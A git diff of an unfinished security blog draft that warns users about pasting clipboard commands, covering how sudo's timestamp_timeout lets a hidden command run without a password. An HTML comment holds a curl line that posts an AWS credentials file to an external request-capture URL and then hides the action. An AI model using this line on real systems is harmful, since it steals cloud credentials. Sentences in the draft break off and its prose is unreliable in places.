nickstanley574/nickstanley574.github.io/_drafts_public/2021-12-21-dont-trust-your-clipboard.md

 nick /home $
 ```

 Notice how for the second sudo command didn't require a password.
 Thats because sudo has a setting entitled, `timestamp_timeout` sets the number of minutes that can elapse before sudo will ask for a passwd again.
 This allow to run multiple sudo command in short pervious of time without needing to re-enter your password over and over again.
 By default is value is set to 5 minutes.
-This is where hackers can
+This is where hackers can take advantage.
+First, have a commands that are legit that require `sudo` access.

 ```
+sudo apt install -yq curl gnupg2 ca-certificates lsb-release sudo apt-get -yq update sudo apt install -yq nginx sudo systemctl start nginx
 ```

-### Social Engineering

-> Social engineering is the psychological manipulation of people into performing actions or divulging confidential information.
-All social engineering techniques are based on specific attributes of human decision-making known as cognitive biases.These biases, sometimes called "bugs in the human hardware", are exploited in various combinations to create attack techniques.
+This could result in malicious or spyware or ransomware being installed on a system.

+### Attack Avenue 2

+Wh

+#
 <!-- curl -s -d "$(cat ~/.aws/credentials_fake)" https://en2lx5n7b4y69.x.pipedream.net/ > /dev/null; top; exit-->

 Your user can access your data your don't need sudo/root.